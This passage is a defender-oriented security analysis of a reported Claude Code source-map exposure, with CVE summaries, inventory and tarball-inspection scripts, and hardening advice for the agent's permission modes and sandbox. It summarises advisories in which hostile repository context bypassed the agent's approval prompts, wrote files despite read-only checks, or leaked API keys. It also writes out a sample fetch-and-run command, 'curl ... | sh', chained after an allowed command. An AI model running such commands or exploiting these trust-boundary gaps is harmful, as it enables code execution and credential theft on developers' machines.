Claude Code did not become news because somebody found a quirky frontend mistake. It became news because public reports on March 31 said Anthropic’s npm-distributed CLI exposed enough source map metadata for outsiders to reconstruct readable TypeScript source, and multiple public GitHub mirrors appeared almost immediately claiming they were derived from cli.js.map for @anthropic-ai/claude-code version 2.1.88. Anthropic’s own changelog and GitHub releases show 2.1.88 as a real public release dated March 30, 2026, which matches the version named in those mirrors. (X (formerly Twitter))

That does not mean every scary claim circulating online is true. The strongest public evidence supports a packaging and artifact-exposure event: a debug or mapping artifact associated with the distributed CLI appears to have been sufficient for substantial source reconstruction. That is already serious. But it is not the same as a confirmed breach of Anthropic’s cloud systems, and it is not the same as proven disclosure of customer repositories, prompts, or local files. Similar source-map cases, including a 2024 Astro advisory, were treated first as confidentiality failures and only second as accelerants for later exploitation research. (GitHub)

One detail is worth stating carefully. Public mirrors and the original social posts are strong evidence that the exposure happened. Current public package-browse pages are weaker evidence about whether the same artifact is still reachable today. For example, jsDelivr currently shows @anthropic-ai/claude-code version 2.1.88 and lists cli.js, but does not obviously list cli.js.map in the public browse page. That does not disprove the event. It means a rigorous write-up must separate the historical exposure claim from the current accessibility question. (jsDelivr)

The cleanest current reading looks like this.

| Question | Best-supported answer right now |
|---|---|
| Was Claude Code source likely exposed in some reconstructable form? | Yes, public mirrors published on March 31 say they were reconstructed from cli.js.map for @anthropic-ai/claude-code 2.1.88 |
| Is 2.1.88 a real official Claude Code release? | Yes, Anthropic’s public changelog and GitHub releases show 2.1.88 released on March 30, 2026 |
| Does the public story involve npm distribution artifacts? | Yes, the public mirrors explicitly tie the source reconstruction to the npm-published package |
| Is an r2.dev object URL technically capable of serving public files? | Yes, Cloudflare documents r2.dev as a public development URL for R2 buckets when public access is enabled |
| Does today’s public CDN browse page prove the map is still accessible? | No, current browse pages are not enough to settle that question |

The table above is grounded in Anthropic release data, Cloudflare’s own R2 documentation, current package mirror metadata, and the public reconstruction repositories published after the event. (GitHub)



Why a source map can turn a bundle into readable source

A source map is not magic. It is a structured file that connects transformed or bundled JavaScript back to original authored source. MDN describes source maps as JSON files that map between transformed code and the original unmodified source, so the original can be reconstructed and used for debugging. In normal development, that is a convenience. In a security context, it is an information exposure surface. (MDN Web Docs)

The mechanism is straightforward. Generated JavaScript commonly ends with a sourceMappingURL directive. Sentry’s documentation explains that tools discovering such a directive will resolve the source map URL relative to the source file, or use a fully qualified URL if one is embedded directly. That matters because once a build artifact publishes the pointer, the rest of the chain becomes fetchable or reconstructable by whatever can read the public file. (Sentry Docs)
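The resolution step described above can be sketched in a few lines. This is a minimal illustration, not any particular tool's implementation: the function name `find_source_map_url` and the example URLs are hypothetical, and the sketch only handles the JavaScript comment form of the directive.

```python
import re
from typing import Optional
from urllib.parse import urljoin

# Matches a `//# sourceMappingURL=...` comment (or the legacy `//@` form)
# that sits on its own line.
_DIRECTIVE = re.compile(r"^\s*//[#@]\s*sourceMappingURL=(\S+)\s*$", re.MULTILINE)


def find_source_map_url(js_text: str, js_url: str) -> Optional[str]:
    """Return the absolute source map URL a tool would try to fetch, or None."""
    matches = _DIRECTIVE.findall(js_text)
    if not matches:
        return None
    # The directive conventionally sits at the end of the file, so use the last one.
    ref = matches[-1]
    if ref.startswith("data:"):
        # Inline map: the mapping data is already embedded in the bundle itself.
        return ref
    # Relative references resolve against the generated file's own URL;
    # fully qualified references pass through unchanged.
    return urljoin(js_url, ref)
```

For a bundle served at `https://cdn.example.com/pkg/cli.js` that ends with `//# sourceMappingURL=cli.js.map`, the function returns `https://cdn.example.com/pkg/cli.js.map`. The point for defenders is that the pointer alone is enough: anyone who can read the bundle can compute where the map should live.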

OWASP treats exposed source maps as a form of information leakage for exactly this reason. Its Web Security Testing Guide notes that source maps make code more human-readable and can help attackers find vulnerabilities or gather sensitive information such as hidden routes, internal structure, or hardcoded details. The key point is not that a source map is always catastrophic. The key point is that it changes the attacker’s cost model. Code that was previously noisy, flattened, or difficult to reason about becomes much easier to study. (OWASP)

Here is the simplified mental model a defender should keep in mind.

    {
      "version": 3,
      "file": "bundle.js",
      "sources": ["src/main.ts", "src/permissions.ts", "src/remote.ts"],
      "mappings": "..."
    }

A file like that can be low-risk or high-risk depending on what else accompanies it. If it includes original sources inline, the disclosure is immediate. If it points to predictable external artifacts, the disclosure can be only one more request away. If it merely maps line numbers but the original source is otherwise private, the impact is smaller. The class of failure is broader than “someone uploaded one wrong file.” It is about whether the full packaging path treated debug artifacts as public or private. (MDN Web Docs)
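The three cases in that paragraph can be turned into a rough triage helper. The sketch below is an assumption-laden illustration: the function name and the category labels are invented here, it only looks at the `sources` and `sourcesContent` fields of a flat version-3 map, and it ignores `sourceRoot` and sectioned index maps.

```python
import json


def classify_source_map(map_text: str) -> str:
    """Roughly grade how much a version-3 source map discloses on its own."""
    data = json.loads(map_text)
    sources = [s for s in (data.get("sources") or []) if isinstance(s, str)]
    contents = data.get("sourcesContent") or []

    # Original code is embedded in the map: disclosure is immediate.
    if any(isinstance(c, str) and c for c in contents):
        return "inline-sources"
    # Sources are absolute URLs: the originals may be one request away.
    if any(s.startswith(("http://", "https://")) for s in sources):
        return "external-pointers"
    # Only relative paths: file names and layout leak, the code itself does not.
    if sources:
        return "paths-only"
    return "empty"
```

Applied to the simplified map shown above, which lists three relative paths and carries no `sourcesContent`, the helper returns `paths-only`. A map that embeds `sourcesContent` would be graded `inline-sources`, which is the case where reconstruction needs nothing beyond the map file.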

That is why Sentry’s own guidance is notable here. Its docs do not present public hosting as the best default. They say the more reliable pattern is to upload source maps directly to Sentry, and if teams want to keep maps secret while still allowing retrieval, they should gate access with a token or other authentication mechanism. In other words, mature tooling already assumes there are legitimate reasons not to expose source maps publicly. (Sentry Docs)

The packaging failure was not one file, it was a chain

The Claude Code story, as publicly reported, implies a multi-step failure chain rather than a single accident. Public posts said the source became reachable through a .map file in the npm distribution and an r2.dev/src.zip path. Public mirrors then said they unpacked cli.js.map from @anthropic-ai/claude-code 2.1.88 and reconstructed source from there. Even if some details of the exact public path are still unresolved, the reported chain is clear enough to reason about: build output, package contents, map references, and object-storage exposure all mattered. (X (formerly Twitter))

Cloudflare’s R2 documentation is useful here because it explains the access model without any speculation. R2 buckets are private by default, but when public access is enabled, objects can be exposed through a Cloudflare-managed r2.dev subdomain. Cloudflare also notes that root bucket listings are not available on public buckets. That is an underappreciated detail. Not being able to list a bucket does not help if another artifact already gives away the exact object path. Security by obscurity collapses the moment a source map, build manifest, or error trace hands an attacker the full URL. (Cloudflare Docs)
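One way to check whether an artifact gives away such a path is to scan its text for absolute URLs on object-storage hosts. The following is a small sketch under stated assumptions: the helper name, the default `.r2.dev` suffix list, and the `pub-example` host in the usage note are all illustrative, and a real review would extend the suffix list to whatever storage providers the organization uses.

```python
import re
from urllib.parse import urlsplit

# Deliberately loose URL matcher: stop at whitespace, quotes, and brackets.
_URL = re.compile(r"https?://[^\s\"'<>)\\]+")


def find_public_object_urls(text, host_suffixes=(".r2.dev",)):
    """Return absolute URLs in `text` whose host ends with one of `host_suffixes`."""
    hits = []
    for url in _URL.findall(text):
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            continue  # malformed URL, nothing to report
        if host.endswith(tuple(host_suffixes)) and url not in hits:
            hits.append(url)
    return hits
```

Run against the contents of a source map, manifest, or log that mentions `https://pub-example.r2.dev/src.zip`, the helper returns that URL. A non-empty result means the "no bucket listing" property is no longer protecting that object.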

This is why the phrase “just a leaked source map” is too casual. A map exposure event is often a distribution-control event. The meaningful question is not whether a .map existed somewhere during build. The meaningful question is whether the final public supply chain allowed that map, or a public pointer behind it, to survive into a channel reachable by outsiders. In practice that means reviewing the tarball, the CDN copy, the object-store rules, the build script defaults, and the post-publish verification step. (Sentry Docs)

The npm angle matters because public package ecosystems amplify mistakes quickly. Anthropic’s own current documentation and official GitHub README now say npm installation is deprecated and recommend native install methods instead, while still documenting npm for compatibility cases. That does not prove the deprecation happened because of this incident, and it would be irresponsible to claim that. But it does mean defenders should immediately separate npm-based Claude Code deployments from native installations during triage, because they follow different distribution paths and different artifact expectations. (Claude API Docs)

Why the Claude Code source map leak matters more than a typical frontend sourcemap

Claude Code is not an ornamental bundle. Anthropic’s overview describes it as an agentic coding tool that reads codebases, edits files, runs commands, and integrates with development tools across terminal, IDE, desktop, and browser surfaces. That is already a different security category from a static site bundle or a dashboard widget. If the implementation details of such a tool become easier to read, the prize is not just nicer syntax highlighting for curious developers. It is a clearer map of trust boundaries, permission decisions, orchestration flows, and integration surfaces. (Claude)

Anthropic’s security documentation reinforces that point. Claude Code uses strict read-only permissions by default, requests approval for additional actions, and includes sandboxed bash, write-scope restrictions, and prompt-injection mitigations. The sandboxed bash model specifically uses filesystem and network isolation, and Anthropic’s permissions documentation says sandbox restrictions can block bash commands from reaching resources outside defined boundaries even if prompt injection influences Claude’s decision-making. A source exposure event involving a runtime like this is not merely about learning how the UI looks. It is about lowering the cost of analyzing how those protections are actually assembled. (Claude)

The remote-control surface makes the point even sharper. Anthropic documents Remote Control as a way to continue a local Claude Code session from another browser or device. The docs are explicit that the session still runs on the user’s machine, that the local process makes outbound HTTPS requests only, and that the connection uses short-lived scoped credentials. That is good security design disclosure, not evidence of a flaw. But it is also the kind of subsystem where implementation details are strategically valuable to anyone trying to understand session state, authentication boundaries, and action brokering in a complex agent runtime. (Claude)

Anthropic also now ships automated security review features inside Claude Code, including /security-review and GitHub Actions-based review. That means Claude Code is not just a coding assistant in the abstract. It is increasingly part of real developer security workflows. A source disclosure involving this kind of tool therefore has a second-order effect: it can influence how developers assess the trustworthiness of the tooling they use to inspect other software. Security tooling attracts higher-grade scrutiny because the economics are different. Researchers do not need a direct exploit on day one for a leak like this to matter. They need a better starting point. (Claude Help Center)

A practical way to think about the stakes is this.

| Claude Code capability | What official docs already disclose | Why implementation exposure matters |
|---|---|---|
| Command execution | Bash is permission-gated and can be sandboxed | Researchers can study exact enforcement and edge cases |
| Repo trust and file editing | Read-only by default, scoped writes, permission modes | Pre-trust ordering bugs and scope mistakes become easier to reason about |
| Remote Control | Session runs locally, outbound HTTPS only, short-lived creds | Session orchestration and auth transitions become cheaper to analyze |
| Hooks, MCP, subprocesses | Claude can integrate with tools and policy layers | Secret propagation and indirect execution paths become more visible |
| Security review features | /security-review and GitHub Actions are supported | Review logic, exclusions, and assumptions become easier to test |

That summary is not a claim that the public leak exposed all of those internals in a weaponizable way. It is a statement about why confidentiality loss around an agentic developer runtime is more consequential than confidentiality loss around a normal frontend asset. Anthropic’s public docs already disclose a meaningful part of the model; readable implementation lowers the remaining barrier. (Claude)

Anthropic already publishes part of the security model, and that makes precision more important

There is a temptation after any leak to treat everything as secret and everything as compromise. That is not how mature product security analysis works. Anthropic already documents a substantial amount of Claude Code’s security model in public: permission modes, plan mode, auto mode, sandboxing, remote control, and security review features. The auto mode docs are especially revealing about design intent. They say a separate classifier reviews actions in context, that tool results are stripped out of the classifier input, and that the feature is a research preview rather than a guarantee of safety. None of that is itself a vulnerability. But it does show that Anthropic sees the same problem defenders see: agentic coding tools live or die on trust boundaries and approval logic. (Claude)

That public disclosure cuts both ways. On the positive side, it means outsiders do not need a leak to understand the broad design philosophy. On the negative side, it means the most interesting remaining questions are precisely the implementation questions: in what order do checks run, where are exceptions applied, when is trust established, which paths are allowed before a prompt, what gets inherited by subprocesses, and how do fallbacks behave under race conditions or malformed input. Those are exactly the questions that become easier to explore when source becomes readable. (Claude)

What the public evidence does not prove

The most important discipline in a fast-moving incident is saying what the evidence does not support. The public repositories and posts reviewed for this story support a claim about source reconstruction from package-distribution artifacts. They do not, on their own, demonstrate theft of customer repositories, session transcripts, or user prompts. The material publicly mirrored after the leak is described as source code, not user data. (GitHub)

The Astro sourcemap advisory is a useful comparison because it says the quiet part out loud. In that case, the immediate impact was exposure of source code, while secrets or environment values were only exposed if they were present verbatim in source. The advisory also notes that the more serious downstream risk is what an attacker can discover next once the code becomes visible. That framing applies here as well. A source exposure event should absolutely be treated seriously. It still should not be inflated into claims the evidence does not support. (GitHub)

The Remote Control feature is another area where precision matters. The existence of remote interaction with Claude Code does not mean the product opens inbound ports on developer machines. Anthropic’s docs say the local process makes outbound HTTPS requests only and that web or mobile interfaces act as a window into the local session. If someone claims the source map leak proved an internet-exposed backdoor into every Claude Code machine, the public documentation does not support that claim. (Claude)

The right current classification is therefore narrower and more credible: this appears to be a source confidentiality event involving a high-value agentic developer tool. That is enough to justify real concern. It is not enough to justify fiction. (GitHub)

A second reality check is worth adding. Public package browse pages can lag, differ, or omit details in ways that make after-the-fact reconstruction messy. The March 31 mirrors say they extracted source from cli.js.map in the official package. Current public jsDelivr browsing shows version 2.1.88 and the main cli.js file, but not an obvious cli.js.map entry in the root listing. That discrepancy is exactly why incident write-ups should distinguish between what was reported to have been accessible at exposure time and what a reader can personally click through days later. Confusing those two states is how rumor replaces analysis. (GitHub)



Why older Claude Code CVEs matter in this discussion

If the March 31 event had involved a passive tool with no history of trust-boundary bugs, the story would still matter, but it would be easier to treat as reputational damage first and security concern second. Claude Code does not fit that description. Over the last year, Anthropic and GitHub have published multiple advisories affecting Claude Code in areas directly related to trust prompts, command execution, IDE integration, and data exfiltration. Those issues are not the same as the source-map leak. They are the context that explains why readable implementation details in this product category are strategically useful. (GitHub)

The pattern becomes obvious when the advisories are viewed side by side.

| CVE | What happened | Affected versions and fix | Why it matters here |
|---|---|---|---|
| CVE-2025-52882 | IDE integrations accepted websocket connections from arbitrary origins, enabling unauthorized access to file and editor state in affected environments | >= 0.2.116, < 1.0.24, fixed in 1.0.24 | Shows how origin and IDE trust boundaries around Claude Code have already been a real issue |
| CVE-2025-59828 | Yarn config and plugins could execute before the user accepted the directory trust dialog | < 1.0.39, fixed in 1.0.39 | Shows that pre-trust execution order is a critical and historically fragile surface |
| CVE-2025-58764 | Command parsing flaws could bypass approval prompts and trigger untrusted command execution from hostile context | < 1.0.105, fixed in 1.0.105 | Shows that prompt and command validation logic is a realistic target, not a theoretical one |
| CVE-2025-64755 | A sed parsing issue could bypass read-only validation and write arbitrary files on the host | < 2.0.31, fixed in 2.0.31 | Shows that “read-only” guarantees can fail at parser and enforcement boundaries |
| CVE-2026-21852 | Claude Code could issue API requests before trust confirmation and leak data including Anthropic API keys via malicious repo settings | < 2.0.65, fixed in 2.0.65 | Shows that startup and project-load flow before trust confirmation is one of the highest-value places to study |

This is the larger reason the source exposure matters. Those advisories reveal a recurring theme: the most consequential Claude Code bugs are not decorative bugs. They are bugs at the seams between user intent, prompt context, repository trust, execution approval, IDE origins, and startup behavior. That is exactly the kind of software where readable source sharply reduces the cost of finding edge cases. (GitHub)

Take CVE-2026-21852 as an example. The GitHub advisory says a malicious repository could set ANTHROPIC_BASE_URL so Claude Code would make requests before showing the trust prompt, potentially leaking API keys. That is not a source-map vulnerability. It is a pre-trust initialization vulnerability. But it demonstrates why developers care about exact project-load order and trust-prompt timing in this product. Once those are known high-value surfaces, any event that makes implementation study cheaper deserves attention. (GitHub)

CVE-2025-59828 makes the same point from another angle. That issue existed because Yarn-related code could execute before directory trust had been accepted. Again, the interesting lesson is not “Yarn is scary.” The interesting lesson is that Claude Code’s safety posture depends on which subsystems run before versus after trust establishment. That is a classic place where implementation details matter more than architectural intent. (GitHub)

CVE-2025-58764 and CVE-2025-64755 move the story from startup trust to execution trust. One advisory says hostile context could bypass an approval prompt and trigger untrusted command execution. The other says a sed parsing flaw could bypass read-only validation and write arbitrary files. Together they show that “approval” and “read-only” are not magical states. They are policy claims implemented by parsing, matching, and enforcement code. When source becomes more readable, those policy claims become easier to test and challenge. (GitHub)
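A toy example makes the "policy claims are implemented by parsing" point concrete. Everything below is hypothetical: the allowlist, both checker functions, and the sample commands are invented for illustration and do not reproduce the logic of Claude Code or of either advisory.

```python
import shlex

# Hypothetical allowlist of command prefixes considered safe to auto-approve.
ALLOWED = {("git", "status"), ("ls",)}


def naive_is_allowed(command: str) -> bool:
    """String-prefix matching: looks reasonable, but ignores shell syntax."""
    return any(command.startswith(" ".join(prefix)) for prefix in ALLOWED)


def stricter_is_allowed(command: str) -> bool:
    """Reject shell metacharacters, then compare whole tokens."""
    if any(ch in command for ch in ";|&`$<>\n"):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False  # unbalanced quotes and similar malformed input
    return any(tuple(tokens[: len(prefix)]) == prefix for prefix in ALLOWED)
```

With these definitions, `naive_is_allowed("git status; curl http://example.invalid | sh")` returns `True`, while the stricter check rejects it and still accepts `ls -la`. Even the stricter version is only a sketch: arguments to an allowed command can carry side effects of their own, which is why enforcement code at this boundary rewards close reading.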

CVE-2025-52882 matters for a similar reason on the IDE side. GitHub’s advisory says affected VS Code and JetBrains integrations allowed unauthorized websocket connections from arbitrary origins and could expose file and editor state. That issue is from a different surface than the CLI tarball. It still belongs in the same conversation because it shows Claude Code is part of a larger multi-surface product family where origin handling, message routing, and session boundaries are all security-relevant. A source exposure event affecting the CLI does not automatically break the IDE. It does make the product family more transparent to external research. (GitHub)

Local CLI, Remote Control, and web sessions are not the same threat surface

Many public takes on the leak collapse all Claude Code deployment modes into one blob. That makes the analysis worse. Anthropic’s docs draw a real boundary between local Claude Code, Remote Control, and Claude Code on the web. Local Claude Code runs on the user’s machine. Remote Control keeps execution on the user’s machine and uses the web or mobile interface as a control surface. Claude Code on the web, by contrast, runs in Anthropic-managed cloud infrastructure. Those are not the same trust model and not the same evidence trail. (Claude)

That distinction matters because incident impact depends on where the exposed implementation actually applies. A packaging problem in an npm-distributed CLI primarily affects the path used by npm-installed local clients. It does not automatically imply the same artifact chain exists in Anthropic’s cloud-hosted web environment. Conversely, a cloud-environment issue would not automatically say much about what is present in a local npm tarball. Mature incident handling starts by drawing these deployment boundaries before it starts predicting blast radius. (Claude API Docs)

The same nuance applies to trust assumptions around network behavior. Anthropic’s data-usage documentation says local Claude Code sends prompts and model outputs over the network to Anthropic services. That means there is always a remote service component in the product experience. But the docs also say Remote Control sessions follow local data flow because execution happens on the machine where the session was started. In other words, source exposure of the local runtime is not automatically the same thing as cloud execution compromise, and cloud execution compromise is not required for a local-runtime confidentiality event to matter. (Claude)

What a serious defender response looks like in the first 24 hours

The first operational mistake most teams make after an incident like this is trying to answer the internet before answering their own asset inventory. Start with the boring questions. Where is Claude Code installed in your environment? Which install paths are in use? Which versions are present? Which developers or CI runners still use the deprecated npm path? Anthropic’s own setup docs and official GitHub repo both say npm installation is deprecated and recommend native installer paths first, with Homebrew and WinGet also documented. That makes npm-based installs the obvious first partition in any response plan. (Claude API Docs)

The second mistake is limiting the search to developer laptops. Agentic coding tools often end up in places developers forget to mention: self-hosted CI runners, GitHub Actions images, devcontainers, shared jump hosts, disposable cloud workstations, and internal golden images. If your organization normalized “just npm install it globally,” you should assume some copy exists somewhere you did not inventory manually. Public package mirrors still show 2.1.88 as a version present in the ecosystem, so “we removed it from one path” is not a sufficient mental model for exposure lifecycle. (jsDelivr)

A practical first-pass inventory might look like this.

    # Local version and path
    claude --version
    command -v claude

    # Check for deprecated npm installation
    npm ls -g @anthropic-ai/claude-code --depth=0

    # Check alternative package managers (run whichever applies to the platform)
    brew list --versions claude-code
    winget list Anthropic.ClaudeCode

Anthropic explicitly documents claude --version, native install, Homebrew, WinGet, and deprecated npm installation, so the goal here is not to invent a new workflow. It is to turn official install guidance into an inventory routine that identifies which distribution path each machine is actually using. (Claude API Docs)
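When the same check has to run across many machines, it helps to collect machine-readable output instead of reading terminal text. The sketch below assumes the inventory step captures `npm ls -g @anthropic-ai/claude-code --depth=0 --json` and ships the JSON somewhere central; the helper name is hypothetical, and the parsing relies only on npm's usual `dependencies` object keyed by package name.

```python
import json
from typing import Optional

PACKAGE = "@anthropic-ai/claude-code"


def npm_global_version(npm_ls_json: str) -> Optional[str]:
    """Extract the globally installed version from `npm ls -g --json` output.

    Returns None when the package is absent or the output is not valid JSON.
    """
    try:
        data = json.loads(npm_ls_json)
    except ValueError:
        return None
    if not isinstance(data, dict):
        return None
    entry = (data.get("dependencies") or {}).get(PACKAGE) or {}
    return entry.get("version")
```

A host that reports a version here is on the deprecated npm path and belongs in the first triage partition; a host that returns `None` may still have a native, Homebrew, or WinGet install and needs the other checks.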

The third question is not about packaging at all. It is about trust posture. Do people on your team routinely point Claude Code at untrusted repositories, plugin bundles, or generated artifacts? If the answer is yes, the source-map story should trigger a broader review of Claude Code hardening, because the product’s real historical risk has often lived at pre-trust and prompt-boundary edges. The relevant lesson from CVE-2026-21852, CVE-2025-59828, CVE-2025-58764, and CVE-2025-64755 is not “panic now.” It is “do not keep a lax runtime posture just because today’s headline was about source disclosure rather than direct compromise.” (GitHub)

The fourth question is how much autonomy you currently allow. Anthropic’s permission-mode documentation is unusually useful here because it does not hide the tradeoffs. The plan mode is read-only planning. The default mode asks before acting outside read-only work. The auto mode uses a classifier and is explicitly described as a research preview rather than a complete safety guarantee. The bypassPermissions mode disables permission checks and is documented as appropriate only in isolated environments like containers or VMs without internet access. That means incident triage should include a permissions posture review, not just a package version review. (Claude)

If your teams explore unfamiliar repositories with broad autonomy enabled, a simple short-term change has disproportionate value: move initial inspection work into plan mode or default mode, keep sandboxing enabled, and reserve bypassPermissions for truly isolated environments. Anthropic’s sandboxing docs say the sandboxed bash tool uses OS-level filesystem and network isolation, while the security docs say sandboxing and deny rules help constrain damage even if prompt injection influences Claude’s decisions. This is the kind of hardening step that still matters even if the March 31 event turns out to have been fully remediated already. (Claude)

Another fast win is credential hygiene around subprocesses. Anthropic’s v2.1.83 release introduced CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1, which strips Anthropic and cloud-provider credentials from subprocess environments such as Bash, hooks, and MCP stdio servers. That release note is important because it acknowledges a real operational truth: even when the main agent runtime is under control, subprocess inheritance can widen the blast radius of a bug or malicious workflow. If you run Claude Code in sensitive environments, this setting deserves real attention. (GitHub)
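The underlying idea, filtering the environment before a helper process is spawned, is easy to illustrate. The sketch below is a generic demonstration of the technique and not Anthropic's implementation: the prefix list and function names are assumptions chosen for the example, and a real deployment would rely on the documented setting instead of a wrapper like this.

```python
import os
import subprocess

# Hypothetical deny-list of variable prefixes, for illustration only.
SENSITIVE_PREFIXES = ("ANTHROPIC_", "AWS_", "GOOGLE_", "AZURE_")


def scrubbed_env(env=None):
    """Copy an environment mapping, dropping variables with sensitive prefixes."""
    source = os.environ if env is None else env
    return {k: v for k, v in source.items() if not k.startswith(SENSITIVE_PREFIXES)}


def run_scrubbed(argv, env=None):
    """Run a child process that never sees the scrubbed variables."""
    return subprocess.run(
        argv,
        env=scrubbed_env(env),
        capture_output=True,
        text=True,
        check=False,
    )
```

The design choice worth noticing is that the filter runs in the parent, before the child exists. A hook or MCP server started this way cannot leak a key it never received, regardless of what the child does afterwards.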

Remote Control policy also deserves review. Anthropic says Remote Control is available on all plans but is off by default for Team and Enterprise until an admin enables it. If your org does not need it, keeping it disabled removes one more surface from day-to-day exposure. If you do need it, make the policy explicit and document where local sessions are allowed to run, because Remote Control interacts with the user’s local filesystem and local tools by design. (Claude)

One thing defenders should not do is rotate every credential in sight on the theory that “the source leak proves the keys were stolen.” The public evidence does not support that jump. Rotate Anthropic API keys, OAuth tokens, or cloud credentials based on concrete exposure paths. For example, if you ran pre-2.0.65 Claude Code in hostile repositories, CVE-2026-21852 creates a real key-exfiltration concern. The March 31 source-map reports alone do not. Mixing those two models together produces expensive theater instead of targeted response. (GitHub)
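Tying rotation decisions to concrete exposure paths starts with knowing which advisories a given installed version is still open to. The sketch below encodes the version bounds from the advisory table earlier in this article; the function names are hypothetical, and it assumes the version string begins with a plain MAJOR.MINOR.PATCH number.

```python
import re

# (lowest affected version or None, first fixed version), copied from the
# advisory table in this article.
ADVISORIES = {
    "CVE-2025-52882": ((0, 2, 116), (1, 0, 24)),
    "CVE-2025-59828": (None, (1, 0, 39)),
    "CVE-2025-58764": (None, (1, 0, 105)),
    "CVE-2025-64755": (None, (2, 0, 31)),
    "CVE-2026-21852": (None, (2, 0, 65)),
}


def parse_version(text):
    """Turn a string that starts with '2.0.64' into the tuple (2, 0, 64)."""
    match = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError(f"unrecognized version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def unpatched_cves(installed):
    """List advisories from the table whose affected range includes `installed`."""
    version = parse_version(installed)
    return sorted(
        cve
        for cve, (lowest, fixed) in ADVISORIES.items()
        if (lowest is None or version >= lowest) and version < fixed
    )
```

A machine that ran 2.0.64 maps to CVE-2026-21852, which is the case where key exfiltration is a real concern if hostile repositories were opened. A machine on 2.1.88 maps to nothing in this table, so the source-map reports alone give no version-based reason to rotate.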

How to inspect the artifact instead of arguing about it

The healthiest response to a packaging incident is not endless speculation about screenshots. It is artifact inspection. If your environment still relies on npm-distributed Claude Code for any reason, or if you want to apply the same discipline to your own packages, inspect the actual tarball. Look for source maps, public debug URLs, and sourceMappingURL directives in the final distributed artifact, not just in the repository or build folder. That is the only check that matches what users and attackers both receive. (Sentry Docs)

A safe local verification pattern looks like this.

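    # Work in a throwaway directory (named WORKDIR so the TMPDIR variable that other tools read stays untouched)
    WORKDIR="$(mktemp -d)"
    cd "$WORKDIR"

    # Pull the exact package version you want to inspect
    npm pack @anthropic-ai/claude-code@2.1.88

    # Inspect package contents without installing globally
    tar -tf ./*.tgz | grep -E '\.map$|cli\.js$'

    # Extract and search for mapping directives or public debug URLs
    # (-o prints only the match, which keeps minified one-line bundles readable)
    tar -xzf ./*.tgz
    grep -R -n -o 'sourceMappingURL[^[:space:]]*' package 2>/dev/null
    grep -R -n -o -E '[^[:space:]"]*(r2\.dev|src\.zip)[^[:space:]"]*' package 2>/dev/null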

That workflow does not attack anything. It simply applies package-supply-chain hygiene to a public artifact. You can use the same method against your own internal packages before release, against mirrored third-party packages during review, or against incident-scoped versions that your organization still has cached. The security value comes from checking the exact thing that crossed the distribution boundary. (OWASP)
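The same inspection can be done without extracting anything to disk, which is convenient when reviewing cached or mirrored tarballs in bulk. This is a minimal sketch with invented names and finding labels; it reads each member into memory and only distinguishes map files, maps that embed `sourcesContent`, and other files that contain a mapping directive.

```python
import io
import json
import tarfile


def audit_tarball(fileobj):
    """Return (member_name, finding) pairs for source maps and map directives."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            if member.name.endswith(".map"):
                try:
                    inline = bool(json.loads(data).get("sourcesContent"))
                except (ValueError, AttributeError):
                    inline = False  # not JSON, or not a JSON object
                label = "map-with-inline-sources" if inline else "map"
                findings.append((member.name, label))
            elif b"sourceMappingURL=" in data:
                findings.append((member.name, "directive"))
    return findings
```

To use it, open a tarball produced by `npm pack` in binary mode and pass the file object to `audit_tarball`. An empty list means neither a map file nor a directive crossed the distribution boundary in that artifact.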

The same logic belongs in CI for your own products.

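    #!/usr/bin/env bash
    set -euo pipefail

    # npm pack prints the tarball name as the last line of stdout;
    # capturing it avoids picking up a stale .tgz left in the directory
    PKG="$(npm pack | tail -n 1)"
    WORKDIR="$(mktemp -d)"
    tar -xzf "$PKG" -C "$WORKDIR"

    # Fail if any source map file shipped in the package
    if find "$WORKDIR/package" -type f | grep -E '\.map$' >/dev/null; then
      echo "Build failed: sourcemap artifact found in package" >&2
      exit 1
    fi

    # Fail if a mapping directive or public artifact URL survived the build
    if grep -R -E 'sourceMappingURL|r2\.dev|src\.zip' "$WORKDIR/package" >/dev/null 2>&1; then
      echo "Build failed: debug pointer or public artifact URL found" >&2
      exit 1
    fi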

The goal is not to ban source maps from existence. The goal is to make them intentional. Sentry’s docs are a good model here: upload them privately when you need them, or gate access if you must host them. Do not leave the question up to whatever the last bundler default happened to be. (Sentry Docs)

How to harden Claude Code after this incident

Packaging response is only one layer. Runtime posture matters more over time. Anthropic’s security docs say Claude Code is read-only by default and requests explicit approval for riskier actions. Its permission-mode docs say plan mode is designed for read-only analysis before edits, while auto reduces prompts through a classifier and bypassPermissions turns checks off in isolated environments only. A reasonable hardening baseline for most teams is simple: use plan or default mode for unfamiliar repos, enable sandboxing for any workflow that can tolerate it, and sharply limit cases where users can run without checks. (Claude)

Anthropic’s docs also make an important point about prompt injection. The security page says Claude Code includes safeguards against prompt injection, and the permissions docs say sandbox restrictions can stop bash access outside defined boundaries even if Claude’s decision-making is influenced. That means the product is already designed around the assumption that model judgment alone is insufficient. Defenders should adopt the same assumption. Do not rely on “the model will probably understand what is safe.” Use sandboxing, deny rules, and environment separation to make unsafe paths nonviable even when the model gets steered. (Claude)

The permission-mode docs are more candid than most vendors about auto. Anthropic says it is a research preview, that it adds classifier round-trips, and that it does not guarantee safety. The docs also spell out what the classifier blocks by default, including downloading and executing code, sending sensitive data to external endpoints, destructive source-control actions, and production-impacting operations. That is useful, but it also means defenders should treat auto as a constrained convenience mode, not as an excuse to loosen surrounding controls. If a workflow is sensitive enough that a human would be unhappy to approve the wrong action once, it is sensitive enough to deserve explicit review and narrow boundaries. (Claude)

Teams that build on Claude Code’s extensibility should be especially careful with hooks, plugins, MCP servers, and subprocesses. These are force multipliers when controlled and blast multipliers when sloppy. Anthropic’s own release note introducing CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 is a reminder that secrets can spread through supporting processes even when the top-level session feels controlled. If your environment grants Claude Code access to internal repos, cloud APIs, or privileged MCP connectors, audit where those credentials flow after the main process spawns helpers. (GitHub)
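The same idea can be applied to helper processes your own tooling spawns. The sketch below is an illustration of the general technique, not a description of how CLAUDE_CODE_SUBPROCESS_ENV_SCRUB works internally. The marker list and the function names `scrubbed_env` and `run_helper` are assumptions made for this example, and a name-based filter will miss secrets stored under innocuous variable names.

```python
import os
import subprocess

# Hypothetical name fragments that mark a variable as sensitive.
# Adjust to the credentials your environment actually uses.
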